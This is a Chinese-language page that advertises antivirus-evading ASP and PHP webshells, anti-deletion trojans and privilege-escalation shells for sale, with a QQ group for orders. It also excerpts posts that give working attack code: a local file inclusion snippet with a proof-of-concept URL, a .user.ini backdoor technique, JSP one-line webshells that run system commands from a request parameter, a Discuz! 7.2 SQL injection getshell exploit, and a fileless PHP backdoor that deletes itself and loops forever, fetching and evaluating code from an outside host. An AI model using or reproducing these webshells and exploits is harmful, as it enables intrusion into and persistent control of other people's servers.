最新免杀asp木马|asp大马 | asp提权大马,asp防删隐藏木马,asp木马加密,asp木马解密,asp不死复活木马

火热虚拟主机提权专用Asp大马火热推荐免杀Asp木马隐藏防删 火热最经典Php大马解密版

火爆最新更新暗组免杀Php大马火爆免杀超越神界Asp大马下载 火爆免杀Asp草泥马4.0版

接单交流QQ群:136549649

php大马 小马巧用包含妙招

2015-04-09

关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的…不过

大家都懒得测试,我就来整理下.

1.普通本地包含;

<?php
$query=$_GET['p'];

include($query);
?>

poc:http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php

../hanguo/test.php为包含的路径.

baohan1.jpg

只要目标服务器支持上传,不管是jpg,txt,gif等都可以,在……

Read more

.user.ini文件构成的超强PHP后门

2014-12-30

这个估计很多同学看了不屑,认为是烂大街的东西了:

那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fastcgi/cgi,我win下的apache上也用的fcgi,可谓很广,不像.htaccess有局限性。

.user.ini

那么什么是.user.ini?

这得从php.ini说起了。php.ini是php默认的配置文件,其中包括了很多php的配置,这些配置中,又分……

Read more

Jsp小后门,Jsp一句话木马后门解密

2014-12-22

一:执行系统命令:

无回显执行系统命令:

<%Runtime.getRuntime().exec(request.getParameter("i"));%>

请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls

执行之后不会有任何回显,用来反弹个shell很方便。

有回显带密码验证的:

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().ex......

Read more

Discuz! 7.2 SQL注入exp(getshell版)木马asp转载

2014-07-11

已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。

参数:

1.可直接getshell

2.爆管理账号密码

3.爆表前缀

如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。

 

<?php

/**
* @author: xiaoma
* @blog  : www.i0day.com
* @date  : 2014.7.2 23:1
*/

error_reporting(0);
set_time_limit(3000);
$host=$argv[1];
$path=$......

Read more

PHP 无文件后门无限循环执行代码

2013-10-08

PHP 无文件后门的意思是驻在 php 后台中的 shell。

nonshell.php

<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);

$remote_file = 'http://www.mumaasp.com/eval.txt';
while($code = file_get_contents($remote_file)){
  @eval($code);
  sleep(5);
};
?>

eval.txt 内容

f......

Read more